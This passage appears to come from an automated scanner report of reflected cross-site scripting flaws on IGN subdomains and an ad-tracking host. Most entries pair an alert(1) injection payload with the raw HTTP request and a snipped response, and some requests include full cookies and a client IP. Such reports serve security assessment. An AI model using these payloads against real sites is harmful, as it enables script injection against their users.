Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/videos.html?c60d1"-alert(1)-"123e4cb45b9=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DS: Games, Che ...[SNIP]... (typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/index/videos.html?c60d1"-alert(1)-"123e4cb45b9=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.172. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/objects/059/059687.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e07f8"><script>alert(1)</script>136d9961b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/059/059687.html?e07f8"><script>alert(1)</script>136d9961b03=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Pokemon Black ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/objects/059/059687.html?e07f8"><script>alert(1)</script>136d9961b03=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.173. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/objects/059/059687.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a09"-alert(1)-"18ec3e4fdb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/059/059687.html?82a09"-alert(1)-"18ec3e4fdb2=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Pokemon Black ...[SNIP]... f _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/objects/059/059687.html?82a09"-alert(1)-"18ec3e4fdb2=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.174. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dvd.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18b7"><script>alert(1)</script>d701efb97e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d18b7"><script>alert(1)</script>d701efb97e5=1 HTTP/1.1 Host: dvd.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.175. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dvd.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98877"-alert(1)-"62dc08d6dae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?98877"-alert(1)-"62dc08d6dae=1 HTTP/1.1 Host: dvd.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DVD: Trailers, ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://dvd.ign.com/?98877"-alert(1)-"62dc08d6dae=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.176. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dvd.ign.com
Path:
/index/release.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d26b"-alert(1)-"5d785c7f042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/release.html?6d26b"-alert(1)-"5d785c7f042=1 HTTP/1.1 Host: dvd.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DVD: Trailers, ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://dvd.ign.com/index/release.html?6d26b"-alert(1)-"5d785c7f042=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.177. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dvd.ign.com
Path:
/index/release.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 272ae"><script>alert(1)</script>2d5abbeb6e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/release.html?272ae"><script>alert(1)</script>2d5abbeb6e2=1 HTTP/1.1 Host: dvd.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.178. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dvd.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b642f"-alert(1)-"3e53dda3679 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/reviews.html?b642f"-alert(1)-"3e53dda3679=1 HTTP/1.1 Host: dvd.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DVD: Trailers, ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://dvd.ign.com/index/reviews.html?b642f"-alert(1)-"3e53dda3679=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.179. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dvd.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0437"><script>alert(1)</script>5e965407bab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/reviews.html?e0437"><script>alert(1)</script>5e965407bab=1 HTTP/1.1 Host: dvd.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 80c1a<script>alert(1)</script>e55540c1d1a was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&uid=amRZRPmRXMjwy5CP_17780c1a<script>alert(1)</script>e55540c1d1a&xy=0%2C0&wh=300%2C250&vchannel=177&cid=Tribal%20Fusion&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.1&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E3651A1AA59DADE1B8CFA9A237B00BEB; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 142 Date: Mon, 07 Feb 2011 01:03:52 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("amRZRPmRXMjwy5CP_17780c1a<script>alert(1)</script>e55540c1d1a");
1.181. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7be29"-alert(1)-"60680a1de34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?7be29"-alert(1)-"60680a1de34=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.182. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af47c"><script>alert(1)</script>c0300f37c7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?af47c"><script>alert(1)</script>c0300f37c7e=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.183. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/ftp.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b48"><script>alert(1)</script>efed23619dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ftp.html?35b48"><script>alert(1)</script>efed23619dd=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.184. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/ftp.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce97b"-alert(1)-"e2eae7445aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ftp.html?ce97b"-alert(1)-"e2eae7445aa=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.185. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/000/000437.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d709"-alert(1)-"d433f769511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/000/000437.html?3d709"-alert(1)-"d433f769511=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.186. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/000/000437.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe0e"><script>alert(1)</script>7df89b8b82a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/000/000437.html?1fe0e"><script>alert(1)</script>7df89b8b82a=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.187. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/143/14349501.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a659"-alert(1)-"5be776a8e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/143/14349501.html?5a659"-alert(1)-"5be776a8e5b=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.188. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/143/14349501.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb74b"><script>alert(1)</script>de5f96bc04e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/143/14349501.html?fb74b"><script>alert(1)</script>de5f96bc04e=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.189. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/143/14354229.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f038c"><script>alert(1)</script>47bca99c6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/143/14354229.html?f038c"><script>alert(1)</script>47bca99c6d1=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.190. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/143/14354229.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9595"-alert(1)-"45b43c2733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/143/14354229.html?a9595"-alert(1)-"45b43c2733=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.191. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/748/748589.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd185"-alert(1)-"4d7636543fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/748/748589.html?fd185"-alert(1)-"4d7636543fe=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.192. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/748/748589.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23c75"><script>alert(1)</script>de8ae575179 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/748/748589.html?23c75"><script>alert(1)</script>de8ae575179=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.193. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/857/857126.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55411"><script>alert(1)</script>dc9dc68c55c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/857/857126.html?55411"><script>alert(1)</script>dc9dc68c55c=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.194. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/objects/857/857126.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 156cf"-alert(1)-"7126e096cae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/857/857126.html?156cf"-alert(1)-"7126e096cae=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.195. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/submit_faq.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda0d"><script>alert(1)</script>6f395dd9df7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit_faq.html?bda0d"><script>alert(1)</script>6f395dd9df7=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.196. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/submit_faq.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a3c"-alert(1)-"f5088556e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /submit_faq.html?67a3c"-alert(1)-"f5088556e3f=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the __ipculture request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16299"%3balert(1)//5f9781b593c was submitted in the __ipculture parameter. This input was echoed as 16299";alert(1)//5f9781b593c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?placement=fim_ign_hub2&__preferredculture=nl-NL&__ipculture=nl-NL16299"%3balert(1)//5f9781b593c HTTP/1.1 Host: fimserve.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040527191%7C1299632527191%3B%20s_lv%3D1297040527193%7C1391648527193%3B%20s_lv_s%3DFirst%2520Visit%7C1297042327193%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:51:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Server: 585087c32e9d95876419f11bda2d6d63409345d960d798fa X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 3898
function google_ad_request_done(google_ads) { var i = 0; if (google_ads == null || google_ads.length == 0) return; var ctl = null; var str = ''; str = ''; document.write('<STYLE> #ad- ...[SNIP]... itionalPageBeaconKVPs && MySpace.AdditionalPageBeaconKVPs.abtest) adData.abtest = MySpace.AdditionalPageBeaconKVPs.abtest; MySpace.Beacon.Request(adData); } } } var __ipculture = "nl-nl16299";alert(1)//5f9781b593c"; var google_page_url = "http://fimserve.ign.com/?placement=fim_ign_hub2&__preferredculture=nl-NL&__ipculture=nl-NL16299%3balert1//5f9781b593c&__preferredculture=sv-SE&__ipculture=sv-SE"; var google_a ...[SNIP]...
The value of the __preferredculture request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d34"%3balert(1)//b1eedcf262 was submitted in the __preferredculture parameter. This input was echoed as e8d34";alert(1)//b1eedcf262 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?placement=fim_ign_hub2&__preferredculture=nl-NLe8d34"%3balert(1)//b1eedcf262&__ipculture=nl-NL HTTP/1.1 Host: fimserve.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040527191%7C1299632527191%3B%20s_lv%3D1297040527193%7C1391648527193%3B%20s_lv_s%3DFirst%2520Visit%7C1297042327193%3B; decc=US; NGUserID=a016c09-18740-885768600-2; 